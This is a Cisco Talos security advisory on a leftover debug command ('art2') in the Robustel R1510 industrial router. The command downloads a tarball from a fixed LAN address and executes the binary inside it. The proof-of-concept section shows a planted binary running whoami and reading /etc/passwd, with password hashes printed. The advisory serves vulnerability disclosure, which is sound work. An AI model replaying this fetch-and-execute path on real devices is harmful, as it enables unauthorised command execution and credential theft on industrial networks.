Headline
CVE-2022-32585: TALOS-2022-1570 || Cisco Talos Intelligence Group
A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.
Summary
A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.
Tested Versions
Robustel R1510 3.3.0
Product URLs
R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/
CVSSv3 Score
9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-489 - Leftover Debug Code
Details
The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.
The R1510 has enabled the SSH service. But, instead of providing a linux shell it prompt a CLISH shell. This shell allow to express, through XML configuration files, different type of commands.
Here it is the prompt after login as admin:
ssh [email protected]
([email protected]) Password:
#
! Comments
add Add a list entry of configuration
clear Clear statistics
config Configuration operation
debug Output debug information to the console
del Delete a list entry of configuration
do Set the level state of the do
exit Exit from the CLI
help Display an overview of the CLI syntax
ovpn_cert_get Download OpenVPN certificate file via http or ftp
ping Send messages to network hosts
reboot Halt and perform a cold restart
set Set system configuration
show Show system configuration
status Show running system information
tftpupdate Update firmware or configuration file using tftp
traceroute Print the route packets trace to network host
trigger Trigger action
urlupdate Update firmware via http or ftp
ver Show version of firmware
#
An hidden command exist in this menu that is called art2:
# art2
String Version of art2
#
When called the following shell script is executed:
#!/bin/sh
#build temporary directory
if [ $# -lt 1 ]; then
echo "Usage : $0 <Version>"
exit 1;
fi
VER=$1
DIR=/tmp/art2
if [ ! -d ${DIR} ]; then
mkdir ${DIR}
fi
cd ${DIR}
#download art.ko and nart.out
rm -rf *
wget http://192.168.0.10/r1510ArtFile.tar.gz
tar -xzvf r1510ArtFile.tar.gz
#change mode of art.ko and nart.out, add execute ability.
chmod 755 r1510-art-factory-${VER}.ko r1510-nart-factory-${VER}.bin
[...]
#start art application
./r1510-nart-factory-${VER}.bin -console
This script will download the file r1510ArtFile.tar.gz from the host with address 192.168.0.10. Then it will unpack the file and eventually execute the file r1510-nart-factory-${VER}.bin contained in it. This can lead to arbitrary command execution.
Exploit Proof of Concept
Following the execution of art2 with 0 as argument.
# art2 0
# Connecting to 192.168.0.10 (192.168.0.10:80)
r1510ArtFile.tar.gz 100% |***************************************| 171 0:00:00 ETA
r1510-nart-factory-0.bin
[...]
root
root:$1$ciDDcCQI$ksDdbx2gX84EQfRCUxKGA/:10933:0:99999:7:::
admin:$1$0Y1zMICY$2676GjK83hpbydoXDggR8/:16506:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
[...]
Inside the r1510-nart-factory-0.bin there are two commands, whoami and cat /etc/passwd.
Timeline
2022-06-27 - Initial vendor contact
2022-06-28 - Vendor Disclosure
2022-06-30 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Related news
Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.
Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. Cisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely. The Robustel R1510 router is a dual-ethernet port wireless router that shares 3G and 4G wireless signals for use in industrial and internet-of-things environments. The router includes the use of open VPN tunneling, a cloud management platform to manage other devices and routers and different safeguards to manage data caps. Talos discovered five operating system command injection vulnerabilities in the router that an adversary could trigger by sending the targeted device a specially crafted network request. All these vulnerabilities have a CVSS severity score of 9.1 out of 10: TALOS-2022-1578 (CVE-2022-34850) TALOS-2022-1577 (CVE-2022-33150) TALOS-2022-1576 (CVE-2022-32765) TALOS-2022-1573 (CVE-2022-33325 ...
Cisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely.
Lilith >_> of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. Cisco Talos recently discovered four vulnerabilities in the Robustel R1510 industrial cellular router. The R1510 is a portable router that shares 2G, 3G and 4G wireless internet access. It comes with... [[ This is only the beginning! Please visit the blog for the complete entry ]]